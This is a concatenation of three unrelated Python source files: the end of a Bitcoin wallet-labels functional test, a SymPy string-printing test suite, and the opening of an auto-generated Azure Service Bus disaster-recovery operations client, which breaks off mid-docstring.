common_address = "msf4WtN1YQKXvNtvdFYt9JBnUD2FB41kjr"
txid = node.sendmany(
fromaccount="",
amounts={common_address: 100},
subtractfeefrom=[common_address],
minconf=1,
)
tx_details = node.gettransaction(txid)
fee = -tx_details['details'][0]['fee']
# there should be 1 address group, with the previously
# unlinked addresses now linked (they both have 0 balance)
address_groups = node.listaddressgroupings()
assert_equal(len(address_groups), 1)
assert_equal(len(address_groups[0]), 2)
assert_equal(set([a[0] for a in address_groups[0]]), linked_addresses)
assert_equal([a[1] for a in address_groups[0]], [0, 0])
node.generate(1)
# we want to reset so that the "" label has what's expected.
# otherwise we're off by exactly the fee amount as that's mined
# and matures in the next 100 blocks
if accounts_api:
node.sendfrom("", common_address, fee)
amount_to_send = 1.0
# Create labels and make sure subsequent label API calls
# recognize the label/address associations.
labels = [Label(name, accounts_api) for name in ("a", "b", "c", "d", "e")]
for label in labels:
if accounts_api:
address = node.getaccountaddress(label.name)
else:
address = node.getnewaddress(label.name)
label.add_receive_address(address)
label.verify(node)
# Check all labels are returned by listlabels.
assert_equal(node.listlabels(), [label.name for label in labels])
# Send a transaction to each label, and make sure this forces
# getaccountaddress to generate a new receiving address.
for label in labels:
if accounts_api:
node.sendtoaddress(label.receive_address, amount_to_send)
label.add_receive_address(node.getaccountaddress(label.name))
else:
node.sendtoaddress(label.addresses[0], amount_to_send)
label.verify(node)
# Check the amounts received.
node.generate(1)
for label in labels:
assert_equal(
node.getreceivedbyaddress(label.addresses[0]), amount_to_send)
assert_equal(node.getreceivedbylabel(label.name), amount_to_send)
# Check that sendfrom label reduces listaccounts balances.
for i, label in enumerate(labels):
to_label = labels[(i + 1) % len(labels)]
if accounts_api:
node.sendfrom(label.name, to_label.receive_address, amount_to_send)
else:
node.sendtoaddress(to_label.addresses[0], amount_to_send)
node.generate(1)
for label in labels:
if accounts_api:
address = node.getaccountaddress(label.name)
else:
address = node.getnewaddress(label.name)
label.add_receive_address(address)
label.verify(node)
assert_equal(node.getreceivedbylabel(label.name), 2)
if accounts_api:
node.move(label.name, "", node.getbalance(label.name))
label.verify(node)
node.generate(101)
expected_account_balances = {"": 5200}
for label in labels:
expected_account_balances[label.name] = 0
if accounts_api:
assert_equal(node.listaccounts(), expected_account_balances)
assert_equal(node.getbalance(""), 5200)
# Check that setlabel can assign a label to a new unused address.
for label in labels:
address = node.getnewaddress()
node.setlabel(address, label.name)
label.add_address(address)
label.verify(node)
if accounts_api:
assert address not in node.getaddressesbyaccount("")
else:
assert_raises_rpc_error(-11, "No addresses with label", node.getaddressesbylabel, "")
# Check that addmultisigaddress can assign labels.
for label in labels:
addresses = []
for x in range(10):
addresses.append(node.getnewaddress())
multisig_address = node.addmultisigaddress(5, addresses, label.name)['address']
label.add_address(multisig_address)
label.purpose[multisig_address] = "send"
label.verify(node)
if accounts_api:
node.sendfrom("", multisig_address, 50)
node.generate(101)
if accounts_api:
for label in labels:
assert_equal(node.getbalance(label.name), 50)
# Check that setlabel can change the label of an address from a
# different label.
change_label(node, labels[0].addresses[0], labels[0], labels[1], accounts_api)
# Check that setlabel can set the label of an address already
# in the label. This is a no-op.
change_label(node, labels[2].addresses[0], labels[2], labels[2], accounts_api)
if accounts_api:
# Check that setaccount can change the label of an address which
# is the receiving address of a different label.
change_label(node, labels[0].receive_address, labels[0], labels[1], accounts_api)
# Check that setaccount can set the label of an address which is
# already the receiving address of the label. This is a no-op.
change_label(node, labels[2].receive_address, labels[2], labels[2], accounts_api)
class Label:
def __init__(self, name, accounts_api):
# Label name
self.name = name
self.accounts_api = accounts_api
# Current receiving address associated with this label.
self.receive_address = None
# List of all addresses assigned with this label
self.addresses = []
# Map of address to address purpose
self.purpose = defaultdict(lambda: "receive")
def add_address(self, address):
assert_equal(address not in self.addresses, True)
self.addresses.append(address)
def add_receive_address(self, address):
self.add_address(address)
if self.accounts_api:
self.receive_address = address
def verify(self, node):
if self.receive_address is not None:
assert self.receive_address in self.addresses
if self.accounts_api:
assert_equal(node.getaccountaddress(self.name), self.receive_address)
for address in self.addresses:
assert_equal(
node.getaddressinfo(address)['labels'][0],
{"name": self.name,
"purpose": self.purpose[address]})
if self.accounts_api:
assert_equal(node.getaccount(address), self.name)
else:
assert_equal(node.getaddressinfo(address)['label'], self.name)
assert_equal(
node.getaddressesbylabel(self.name),
{address: {"purpose": self.purpose[address]} for address in self.addresses})
if self.accounts_api:
assert_equal(set(node.getaddressesbyaccount(self.name)), set(self.addresses))
def change_label(node, address, old_label, new_label, accounts_api):
assert_equal(address in old_label.addresses, True)
if accounts_api:
node.setaccount(address, new_label.name)
else:
node.setlabel(address, new_label.name)
old_label.addresses.remove(address)
new_label.add_address(address)
# Calling setaccount on an address which was previously the receiving
# address of a different account should reset the receiving address of
# the old account, causing getaccountaddress to return a brand new
# address.
if accounts_api:
if old_label.name != new_label.name and address == old_label.receive_address:
new_address = node.getaccountaddress(old_label.name)
assert_equal(new_address not in old_label.addresses, True)
assert_equal(new_address not in new_label.addresses, True)
old_label.add_receive_address(new_address)
old_label.verify(node)
new_label.verify(node)
if __name__ == '__main__':
WalletLabelsTest().main()
|
|
from __future__ import division
from sympy import (Abs, Catalan, cos, Derivative, E, EulerGamma, exp,
factorial, factorial2, Function, GoldenRatio, I, Integer, Integral,
Interval, Lambda, Limit, Matrix, nan, O, oo, pi, Rational, Float, Rel,
S, sin, SparseMatrix, sqrt, summation, Sum, Symbol, symbols, Wild,
WildFunction, zeta, zoo, Dummy, Dict, Tuple, FiniteSet, factor,
MatrixSymbol, subfactorial, true, false, Equivalent, Xor, Complement)
from sympy.core import Expr
from sympy.physics.units import second, joule
from sympy.polys import Poly, RootOf, RootSum, groebner, ring, field, ZZ, QQ, lex, grlex
from sympy.geometry import Point, Circle
from sympy.utilities.pytest import raises
from sympy.printing import sstr, sstrrepr, StrPrinter
from sympy.core.trace import Tr
x, y, z, w = symbols('x,y,z,w')
d = Dummy('d')
def test_printmethod():
class R(Abs):
def _sympystr(self, printer):
return "foo(%s)" % printer._print(self.args[0])
assert sstr(R(x)) == "foo(x)"
class R(Abs):
def _sympystr(self, printer):
return "foo"
assert sstr(R(x)) == "foo"
def test_Abs():
assert str(Abs(x)) == "Abs(x)"
assert str(Abs(Rational(1, 6))) == "1/6"
assert str(Abs(Rational(-1, 6))) == "1/6"
def test_Add():
assert str(x + y) == "x + y"
assert str(x + 1) == "x + 1"
assert str(x + x**2) == "x**2 + x"
assert str(5 + x + y + x*y + x**2 + y**2) == "x**2 + x*y + x + y**2 + y + 5"
assert str(1 + x + x**2/2 + x**3/3) == "x**3/3 + x**2/2 + x + 1"
assert str(2*x - 7*x**2 + 2 + 3*y) == "-7*x**2 + 2*x + 3*y + 2"
assert str(x - y) == "x - y"
assert str(2 - x) == "-x + 2"
assert str(x - 2) == "x - 2"
assert str(x - y - z - w) == "-w + x - y - z"
assert str(x - z*y**2*z*w) == "-w*y**2*z**2 + x"
assert str(x - 1*y*x*y) == "-x*y**2 + x"
assert str(sin(x).series(x, 0, 15)) == "x - x**3/6 + x**5/120 - x**7/5040 + x**9/362880 - x**11/39916800 + x**13/6227020800 + O(x**15)"
def test_Catalan():
assert str(Catalan) == "Catalan"
def test_ComplexInfinity():
assert str(zoo) == "zoo"
def test_Derivative():
assert str(Derivative(x, y)) == "Derivative(x, y)"
assert str(Derivative(x**2, x, evaluate=False)) == "Derivative(x**2, x)"
assert str(Derivative(
x**2/y, x, y, evaluate=False)) == "Derivative(x**2/y, x, y)"
def test_dict():
assert str({1: 1 + x}) == sstr({1: 1 + x}) == "{1: x + 1}"
assert str({1: x**2, 2: y*x}) in ("{1: x**2, 2: x*y}", "{2: x*y, 1: x**2}")
assert sstr({1: x**2, 2: y*x}) == "{1: x**2, 2: x*y}"
def test_Dict():
assert str(Dict({1: 1 + x})) == sstr({1: 1 + x}) == "{1: x + 1}"
assert str(Dict({1: x**2, 2: y*x})) in (
"{1: x**2, 2: x*y}", "{2: x*y, 1: x**2}")
assert sstr(Dict({1: x**2, 2: y*x})) == "{1: x**2, 2: x*y}"
def test_Dummy():
assert str(d) == "_d"
assert str(d + x) == "_d + x"
def test_EulerGamma():
assert str(EulerGamma) == "EulerGamma"
def test_Exp():
assert str(E) == "E"
def test_factorial():
n = Symbol('n', integer=True)
assert str(factorial(-2)) == "zoo"
assert str(factorial(0)) == "1"
assert str(factorial(7)) == "5040"
assert str(factorial(n)) == "factorial(n)"
assert str(factorial(2*n)) == "factorial(2*n)"
assert str(factorial(factorial(n))) == 'factorial(factorial(n))'
assert str(factorial(factorial2(n))) == 'factorial(factorial2(n))'
assert str(factorial2(factorial(n))) == 'factorial2(factorial(n))'
assert str(factorial2(factorial2(n))) == 'factorial2(factorial2(n))'
assert str(subfactorial(3)) == "2"
assert str(subfactorial(n)) == "subfactorial(n)"
assert str(subfactorial(2*n)) == "subfactorial(2*n)"
def test_Function():
f = Function('f')
fx = f(x)
w = WildFunction('w')
assert str(f) == "f"
assert str(fx) == "f(x)"
assert str(w) == "w_"
def test_Geometry():
assert sstr(Point(0, 0)) == 'Point(0, 0)'
assert sstr(Circle(Point(0, 0), 3)) == 'Circle(Point(0, 0), 3)'
# TODO test other Geometry entities
def test_GoldenRatio():
assert str(GoldenRatio) == "GoldenRatio"
def test_ImaginaryUnit():
assert str(I) == "I"
def test_Infinity():
assert str(oo) == "oo"
assert str(oo*I) == "oo*I"
def test_Integer():
assert str(Integer(-1)) == "-1"
assert str(Integer(1)) == "1"
assert str(Integer(-3)) == "-3"
assert str(Integer(0)) == "0"
assert str(Integer(25)) == "25"
def test_Integral():
assert str(Integral(sin(x), y)) == "Integral(sin(x), y)"
assert str(Integral(sin(x), (y, 0, 1))) == "Integral(sin(x), (y, 0, 1))"
def test_Interval():
a = Symbol('a', real=True)
assert str(Interval(0, a)) == "[0, a]"
assert str(Interval(0, a, False, False)) == "[0, a]"
assert str(Interval(0, a, True, False)) == "(0, a]"
assert str(Interval(0, a, False, True)) == "[0, a)"
assert str(Interval(0, a, True, True)) == "(0, a)"
def test_Lambda():
assert str(Lambda(d, d**2)) == "Lambda(_d, _d**2)"
# issue 2908
assert str(Lambda((), 1)) == "Lambda((), 1)"
assert str(Lambda((), x)) == "Lambda((), x)"
def test_Limit():
assert str(Limit(sin(x)/x, x, y)) == "Limit(sin(x)/x, x, y)"
assert str(Limit(1/x, x, 0)) == "Limit(1/x, x, 0)"
assert str(
Limit(sin(x)/x, x, y, dir="-")) == "Limit(sin(x)/x, x, y, dir='-')"
def test_list():
assert str([x]) == sstr([x]) == "[x]"
assert str([x**2, x*y + 1]) == sstr([x**2, x*y + 1]) == "[x**2, x*y + 1]"
assert str([x**2, [y + x]]) == sstr([x**2, [y + x]]) == "[x**2, [x + y]]"
def test_Matrix_str():
M = Matrix([[x**+1, 1], [y, x + y]])
assert str(M) == "Matrix([[x, 1], [y, x + y]])"
assert sstr(M) == "Matrix([\n[x, 1],\n[y, x + y]])"
M = Matrix([[1]])
assert str(M) == sstr(M) == "Matrix([[1]])"
M = Matrix([[1, 2]])
assert str(M) == sstr(M) == "Matrix([[1, 2]])"
M = Matrix()
assert str(M) == sstr(M) == "Matrix(0, 0, [])"
M = Matrix(0, 1, lambda i, j: 0)
assert str(M) == sstr(M) == "Matrix(0, 1, [])"
def test_Mul():
assert str(x/y) == "x/y"
assert str(y/x) == "y/x"
assert str(x/y/z) == "x/(y*z)"
assert str((x + 1)/(y + 2)) == "(x + 1)/(y + 2)"
assert str(2*x/3) == '2*x/3'
assert str(-2*x/3) == '-2*x/3'
assert str(-1.0*x) == '-1.0*x'
assert str(1.0*x) == '1.0*x'
class CustomClass1(Expr):
is_commutative = True
class CustomClass2(Expr):
is_commutative = True
cc1 = CustomClass1()
cc2 = CustomClass2()
assert str(Rational(2)*cc1) == '2*CustomClass1()'
assert str(cc1*Rational(2)) == '2*CustomClass1()'
assert str(cc1*Float("1.5")) == '1.5*CustomClass1()'
assert str(cc2*Rational(2)) == '2*CustomClass2()'
assert str(cc2*Rational(2)*cc1) == '2*CustomClass1()*CustomClass2()'
assert str(cc1*Rational(2)*cc2) == '2*CustomClass1()*CustomClass2()'
def test_NaN():
assert str(nan) == "nan"
def test_NegativeInfinity():
assert str(-oo) == "-oo"
def test_Order():
assert str(O(x)) == "O(x)"
assert str(O(x**2)) == "O(x**2)"
assert str(O(x*y)) == "O(x*y, x, y)"
assert str(O(x, x)) == "O(x)"
assert str(O(x, (x, 0))) == "O(x)"
assert str(O(x, (x, oo))) == "O(x, (x, oo))"
assert str(O(x, x, y)) == "O(x, x, y)"
assert str(O(x, x, y)) == "O(x, x, y)"
assert str(O(x, (x, oo), (y, oo))) == "O(x, (x, oo), (y, oo))"
def test_Permutation_Cycle():
from sympy.combinatorics import Permutation, Cycle
# general principle: economically, canonically show all moved elements
# and the size of the permutation.
for p, s in [
(Cycle(),
'Cycle()'),
(Cycle(2),
'Cycle(2)'),
(Cycle(2, 1),
'Cycle(1, 2)'),
(Cycle(1, 2)(5)(6, 7)(10),
'Cycle(1, 2)(6, 7)(10)'),
(Cycle(3, 4)(1, 2)(3, 4),
'Cycle(1, 2)(4)'),
]:
assert str(p) == s
Permutation.print_cyclic = False
for p, s in [
(Permutation([]),
'Permutation([])'),
(Permutation([], size=1),
'Permutation([0])'),
(Permutation([], size=2),
'Permutation([0, 1])'),
(Permutation([], size=10),
'Permutation([], size=10)'),
(Permutation([1, 0, 2]),
'Permutation([1, 0, 2])'),
(Permutation([1, 0, 2, 3, 4, 5]),
'Permutation([1, 0], size=6)'),
(Permutation([1, 0, 2, 3, 4, 5], size=10),
'Permutation([1, 0], size=10)'),
]:
assert str(p) == s
Permutation.print_cyclic = True
for p, s in [
(Permutation([]),
'Permutation()'),
(Permutation([], size=1),
'Permutation(0)'),
(Permutation([], size=2),
'Permutation(1)'),
(Permutation([], size=10),
'Permutation(9)'),
(Permutation([1, 0, 2]),
'Permutation(2)(0, 1)'),
(Permutation([1, 0, 2, 3, 4, 5]),
'Permutation(5)(0, 1)'),
(Permutation([1, 0, 2, 3, 4, 5], size=10),
'Permutation(9)(0, 1)'),
(Permutation([0, 1, 3, 2, 4, 5], size=10),
'Permutation(9)(2, 3)'),
]:
assert str(p) == s
def test_Pi():
assert str(pi) == "pi"
def test_Poly():
assert str(Poly(0, x)) == "Poly(0, x, domain='ZZ')"
assert str(Poly(1, x)) == "Poly(1, x, domain='ZZ')"
assert str(Poly(x, x)) == "Poly(x, x, domain='ZZ')"
assert str(Poly(2*x + 1, x)) == "Poly(2*x + 1, x, domain='ZZ')"
assert str(Poly(2*x - 1, x)) == "Poly(2*x - 1, x, domain='ZZ')"
assert str(Poly(-1, x)) == "Poly(-1, x, domain='ZZ')"
assert str(Poly(-x, x)) == "Poly(-x, x, domain='ZZ')"
assert str(Poly(-2*x + 1, x)) == "Poly(-2*x + 1, x, domain='ZZ')"
assert str(Poly(-2*x - 1, x)) == "Poly(-2*x - 1, x, domain='ZZ')"
assert str(Poly(x - 1, x)) == "Poly(x - 1, x, domain='ZZ')"
assert str(
Poly(x**2 + 1 + y, x)) == "Poly(x**2 + y + 1, x, domain='ZZ[y]')"
assert str(
Poly(x**2 - 1 + y, x)) == "Poly(x**2 + y - 1, x, domain='ZZ[y]')"
assert str(Poly(x**2 + I*x, x)) == "Poly(x**2 + I*x, x, domain='EX')"
assert str(Poly(x**2 - I*x, x)) == "Poly(x**2 - I*x, x, domain='EX')"
assert str(Poly(-x*y*z + x*y - 1, x, y, z)
) == "Poly(-x*y*z + x*y - 1, x, y, z, domain='ZZ')"
assert str(Poly(-w*x**21*y**7*z + (1 + w)*z**3 - 2*x*z + 1, x, y, z)) == \
"Poly(-w*x**21*y**7*z - 2*x*z + (w + 1)*z**3 + 1, x, y, z, domain='ZZ[w]')"
assert str(Poly(x**2 + 1, x, modulus=2)) == "Poly(x**2 + 1, x, modulus=2)"
assert str(Poly(2*x**2 + 3*x + 4, x, modulus=17)) == "Poly(2*x**2 + 3*x + 4, x, modulus=17)"
def test_PolyRing():
assert str(ring("x", ZZ, lex)[0]) == "Polynomial ring in x over ZZ with lex order"
assert str(ring("x,y", QQ, grlex)[0]) == "Polynomial ring in x, y over QQ with grlex order"
assert str(ring("x,y,z", ZZ["t"], lex)[0]) == "Polynomial ring in x, y, z over ZZ[t] with lex order"
def test_FracField():
assert str(field("x", ZZ, lex)[0]) == "Rational function field in x over ZZ with lex order"
assert str(field("x,y", QQ, grlex)[0]) == "Rational function field in x, y over QQ with grlex order"
assert str(field("x,y,z", ZZ["t"], lex)[0]) == "Rational function field in x, y, z over ZZ[t] with lex order"
def test_PolyElement():
Ruv, u,v = ring("u,v", ZZ)
Rxyz, x,y,z = ring("x,y,z", Ruv)
assert str(x - x) == "0"
assert str(x - 1) == "x - 1"
assert str(x + 1) == "x + 1"
assert str((u**2 + 3*u*v + 1)*x**2*y + u + 1) == "(u**2 + 3*u*v + 1)*x**2*y + u + 1"
assert str((u**2 + 3*u*v + 1)*x**2*y + (u + 1)*x) == "(u**2 + 3*u*v + 1)*x**2*y + (u + 1)*x"
assert str((u**2 + 3*u*v + 1)*x**2*y + (u + 1)*x + 1) == "(u**2 + 3*u*v + 1)*x**2*y + (u + 1)*x + 1"
assert str((-u**2 + 3*u*v - 1)*x**2*y - (u + 1)*x - 1) == "-(u**2 - 3*u*v + 1)*x**2*y - (u + 1)*x - 1"
assert str(-(v**2 + v + 1)*x + 3*u*v + 1) == "-(v**2 + v + 1)*x + 3*u*v + 1"
assert str(-(v**2 + v + 1)*x - 3*u*v + 1) == "-(v**2 + v + 1)*x - 3*u*v + 1"
def test_FracElement():
Fuv, u,v = field("u,v", ZZ)
Fxyzt, x,y,z,t = field("x,y,z,t", Fuv)
assert str(x - x) == "0"
assert str(x - 1) == "x - 1"
assert str(x + 1) == "x + 1"
assert str(x/3) == "x/3"
assert str(x/z) == "x/z"
assert str(x*y/z) == "x*y/z"
assert str(x/(z*t)) == "x/(z*t)"
assert str(x*y/(z*t)) == "x*y/(z*t)"
assert str((x - 1)/y) == "(x - 1)/y"
assert str((x + 1)/y) == "(x + 1)/y"
assert str((-x - 1)/y) == "(-x - 1)/y"
assert str((x + 1)/(y*z)) == "(x + 1)/(y*z)"
assert str(-y/(x + 1)) == "-y/(x + 1)"
assert str(y*z/(x + 1)) == "y*z/(x + 1)"
assert str(((u + 1)*x*y + 1)/((v - 1)*z - 1)) == "((u + 1)*x*y + 1)/((v - 1)*z - 1)"
assert str(((u + 1)*x*y + 1)/((v - 1)*z - t*u*v - 1)) == "((u + 1)*x*y + 1)/((v - 1)*z - u*v*t - 1)"
def test_Pow():
assert str(x**-1) == "1/x"
assert str(x**-2) == "x**(-2)"
assert str(x**2) == "x**2"
assert str((x + y)**-1) == "1/(x + y)"
assert str((x + y)**-2) == "(x + y)**(-2)"
assert str((x + y)**2) == "(x + y)**2"
assert str((x + y)**(1 + x)) == "(x + y)**(x + 1)"
assert str(x**Rational(1, 3)) == "x**(1/3)"
assert str(1/x**Rational(1, 3)) == "x**(-1/3)"
assert str(sqrt(sqrt(x))) == "x**(1/4)"
# not the same as x**-1
assert str(x**-1.0) == 'x**(-1.0)'
# see issue #2860
assert str(S(2)**-1.0) == '2**(-1.0)'
def test_sqrt():
assert str(sqrt(x)) == "sqrt(x)"
assert str(sqrt(x**2)) == "sqrt(x**2)"
assert str(1/sqrt(x)) == "1/sqrt(x)"
assert str(1/sqrt(x**2)) == "1/sqrt(x**2)"
assert str(y/sqrt(x)) == "y/sqrt(x)"
assert str(x**(1/2)) == "x**0.5"
assert str(1/x**(1/2)) == "x**(-0.5)"
def test_Rational():
n1 = Rational(1, 4)
n2 = Rational(1, 3)
n3 = Rational(2, 4)
n4 = Rational(2, -4)
n5 = Rational(0)
n7 = Rational(3)
n8 = Rational(-3)
assert str(n1*n2) == "1/12"
assert str(n1*n2) == "1/12"
assert str(n3) == "1/2"
assert str(n1*n3) == "1/8"
assert str(n1 + n3) == "3/4"
assert str(n1 + n2) == "7/12"
assert str(n1 + n4) == "-1/4"
assert str(n4*n4) == "1/4"
assert str(n4 + n2) == "-1/6"
assert str(n4 + n5) == "-1/2"
assert str(n4*n5) == "0"
assert str(n3 + n4) == "0"
assert str(n1**n7) == "1/64"
assert str(n2**n7) == "1/27"
assert str(n2**n8) == "27"
assert str(n7**n8) == "1/27"
assert str(Rational("-25")) == "-25"
assert str(Rational("1.25")) == "5/4"
assert str(Rational("-2.6e-2")) == "-13/500"
assert str(S("25/7")) == "25/7"
assert str(S("-123/569")) == "-123/569"
assert str(S("0.1[23]", rational=1)) == "61/495"
assert str(S("5.1[666]", rational=1)) == "31/6"
assert str(S("-5.1[666]", rational=1)) == "-31/6"
assert str(S("0.[9]", rational=1)) == "1"
assert str(S("-0.[9]", rational=1)) == "-1"
assert str(sqrt(Rational(1, 4))) == "1/2"
assert str(sqrt(Rational(1, 36))) == "1/6"
assert str((123**25) ** Rational(1, 25)) == "123"
assert str((123**25 + 1)**Rational(1, 25)) != "123"
assert str((123**25 - 1)**Rational(1, 25)) != "123"
assert str((123**25 - 1)**Rational(1, 25)) != "122"
assert str(sqrt(Rational(81, 36))**3) == "27/8"
assert str(1/sqrt(Rational(81, 36))**3) == "8/27"
assert str(sqrt(-4)) == str(2*I)
assert str(2**Rational(1, 10**10)) == "2**(1/10000000000)"
def test_Float():
# NOTE prec is the whole number of decimal digits
assert str(Float('1.23', prec=1 + 2)) == '1.23'
assert str(Float('1.23456789', prec=1 + 8)) == '1.23456789'
assert str(
Float('1.234567890123456789', prec=1 + 18)) == '1.234567890123456789'
assert str(pi.evalf(1 + 2)) == '3.14'
assert str(pi.evalf(1 + 14)) == '3.14159265358979'
assert str(pi.evalf(1 + 64)) == ('3.141592653589793238462643383279'
'5028841971693993751058209749445923')
assert str(pi.round(-1)) == '0.'
assert str((pi**400 - (pi**400).round(1)).n(2)) == '-0.e+88'
def test_Relational():
assert str(Rel(x, y, "<")) == "x < y"
assert str(Rel(x + y, y, "==")) == "x + y == y"
def test_RootOf():
assert str(RootOf(x**5 + 2*x - 1, 0)) == "RootOf(x**5 + 2*x - 1, 0)"
def test_RootSum():
f = x**5 + 2*x - 1
assert str(
RootSum(f, Lambda(z, z), auto=False)) == "RootSum(x**5 + 2*x - 1)"
assert str(RootSum(f, Lambda(
z, z**2), auto=False)) == "RootSum(x**5 + 2*x - 1, Lambda(z, z**2))"
def test_GroebnerBasis():
assert str(groebner(
[], x, y)) == "GroebnerBasis([], x, y, domain='ZZ', order='lex')"
F = [x**2 - 3*y - x + 1, y**2 - 2*x + y - 1]
assert str(groebner(F, order='grlex')) == \
"GroebnerBasis([x**2 - x - 3*y + 1, y**2 - 2*x + y - 1], x, y, domain='ZZ', order='grlex')"
assert str(groebner(F, order='lex')) == \
"GroebnerBasis([2*x - y**2 - y + 1, y**4 + 2*y**3 - 3*y**2 - 16*y + 7], x, y, domain='ZZ', order='lex')"
def test_set():
assert sstr(set()) == 'set()'
assert sstr(frozenset()) == 'frozenset()'
assert sstr(set([1, 2, 3])) == 'set([1, 2, 3])'
assert sstr(
set([1, x, x**2, x**3, x**4])) == 'set([1, x, x**2, x**3, x**4])'
def test_SparseMatrix():
M = SparseMatrix([[x**+1, 1], [y, x + y]])
assert str(M) == "Matrix([[x, 1], [y, x + y]])"
assert sstr(M) == "Matrix([\n[x, 1],\n[y, x + y]])"
def test_Sum():
assert str(summation(cos(3*z), (z, x, y))) == "Sum(cos(3*z), (z, x, y))"
assert str(Sum(x*y**2, (x, -2, 2), (y, -5, 5))) == \
"Sum(x*y**2, (x, -2, 2), (y, -5, 5))"
def test_Symbol():
assert str(y) == "y"
assert str(x) == "x"
e = x
assert str(e) == "x"
def test_tuple():
assert str((x,)) == sstr((x,)) == "(x,)"
assert str((x + y, 1 + x)) == sstr((x + y, 1 + x)) == "(x + y, x + 1)"
assert str((x + y, (
1 + x, x**2))) == sstr((x + y, (1 + x, x**2))) == "(x + y, (x + 1, x**2))"
def test_Unit():
assert str(second) == "s"
assert str(joule) == "kg*m**2/s**2" # issue 5560
def test_wild_str():
# Check expressions containing Wild not causing infinite recursion
w = Wild('x')
assert str(w + 1) == 'x_ + 1'
assert str(exp(2**w) + 5) == 'exp(2**x_) + 5'
assert str(3*w + 1) == '3*x_ + 1'
assert str(1/w + 1) == '1 + 1/x_'
assert str(w**2 + 1) == 'x_**2 + 1'
assert str(1/(1 - w)) == '1/(-x_ + 1)'
def test_zeta():
assert str(zeta(3)) == "zeta(3)"
def test_bug2():
e = x - y
a = str(e)
b = str(e)
assert a == b
def test_bug4():
e = -2*sqrt(x) - y/sqrt(x)/2
assert str(e) not in ["(-2)*x**1/2(-1/2)*x**(-1/2)*y",
"-2*x**1/2(-1/2)*x**(-1/2)*y", "-2*x**1/2-1/2*x**-1/2*w"]
assert str(e) == "-2*sqrt(x) - y/(2*sqrt(x))"
def test_issue_4021():
e = Integral(x, x) + 1
assert str(e) == 'Integral(x, x) + 1'
def test_sstrrepr():
assert sstr('abc') == 'abc'
assert sstrrepr('abc') == "'abc'"
e = ['a', 'b', 'c', x]
assert sstr(e) == "[a, b, c, x]"
assert sstrrepr(e) == "['a', 'b', 'c', x]"
def test_infinity():
assert sstr(oo*I) == "oo*I"
def test_full_prec():
assert sstr(S("0.3"), full_prec=True) == "0.300000000000000"
assert sstr(S("0.3"), full_prec="auto") == "0.300000000000000"
assert sstr(S("0.3"), full_prec=False) == "0.3"
assert sstr(S("0.3")*x, full_prec=True) in [
"0.300000000000000*x",
"x*0.300000000000000"
]
assert sstr(S("0.3")*x, full_prec="auto") in [
"0.3*x",
"x*0.3"
]
assert sstr(S("0.3")*x, full_prec=False) in [
"0.3*x",
"x*0.3"
]
def test_noncommutative():
A, B, C = symbols('A,B,C', commutative=False)
assert sstr(A*B*C**-1) == "A*B*C**(-1)"
assert sstr(C**-1*A*B) == "C**(-1)*A*B"
assert sstr(A*C**-1*B) == "A*C**(-1)*B"
assert sstr(sqrt(A)) == "sqrt(A)"
assert sstr(1/sqrt(A)) == "A**(-1/2)"
def test_empty_printer():
str_printer = StrPrinter()
assert str_printer.emptyPrinter("foo") == "foo"
assert str_printer.emptyPrinter(x*y) == "x*y"
assert str_printer.emptyPrinter(32) == "32"
def test_settings():
raises(TypeError, lambda: sstr(S(4), method="garbage"))
def test_RandomDomain():
from sympy.stats import Normal, Die, Exponential, pspace, where
X = Normal('x1', 0, 1)
assert str(where(X > 0)) == "Domain: x1 > 0"
D = Die('d1', 6)
assert str(where(D > 4)) == "Domain: Or(d1 == 5, d1 == 6)"
A = Exponential('a', 1)
B = Exponential('b', 1)
assert str(pspace(Tuple(A, B)).domain) == "Domain: And(a >= 0, b >= 0)"
def test_FiniteSet():
assert str(FiniteSet(*range(1, 51))) == '{1, 2, 3, ..., 48, 49, 50}'
assert str(FiniteSet(*range(1, 6))) == '{1, 2, 3, 4, 5}'
def test_PrettyPoly():
from sympy.polys.domains import QQ
F = QQ.frac_field(x, y)
R = QQ[x, y]
assert sstr(F.convert(x/(x + y))) == sstr(x/(x + y))
assert sstr(R.convert(x + y)) == sstr(x + y)
def test_categories():
from sympy.categories import (Object, NamedMorphism,
IdentityMorphism, Category)
A = Object("A")
B = Object("B")
f = NamedMorphism(A, B, "f")
id_A = IdentityMorphism(A)
K = Category("K")
assert str(A) == 'Object("A")'
assert str(f) == 'NamedMorphism(Object("A"), Object("B"), "f")'
assert str(id_A) == 'IdentityMorphism(Object("A"))'
assert str(K) == 'Category("K")'
def test_Tr():
A, B = symbols('A B', commutative=False)
t = Tr(A*B)
assert str(t) == 'Tr(A*B)'
def test_issue_6387():
assert str(factor(-3.0*z + 3)) == '-3.0*(1.0*z - 1.0)'
def test_MatMul_MatAdd():
from sympy import MatrixSymbol
assert str(2*(MatrixSymbol("X", 2, 2) + MatrixSymbol("Y", 2, 2))) == \
"2*(X + Y)"
def test_MatrixSlice():
from sympy.matrices.expressions import MatrixSymbol
assert str(MatrixSymbol('X', 10, 10)[:5, 1:9:2]) == 'X[:5, 1:9:2]'
assert str(MatrixSymbol('X', 10, 10)[5, :5:2]) == 'X[5, :5:2]'
def test_true_false():
assert str(true) == repr(true) == sstr(true) == "True"
assert str(false) == repr(false) == sstr(false) == "False"
def test_Equivalent():
assert str(Equivalent(y, x)) == "Equivalent(x, y)"
def test_Xor():
assert str(Xor(y, x, evaluate=False)) == "Xor(x, y)"
def test_Complement():
    assert str(Complement(S.Reals, S.Naturals)) == '(-oo, oo) \\ Naturals()'
|
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class DisasterRecoveryConfigsOperations(object):
"""DisasterRecoveryConfigsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.servicebus.v2021_01_01_preview.models
:param client: Client for service requests.
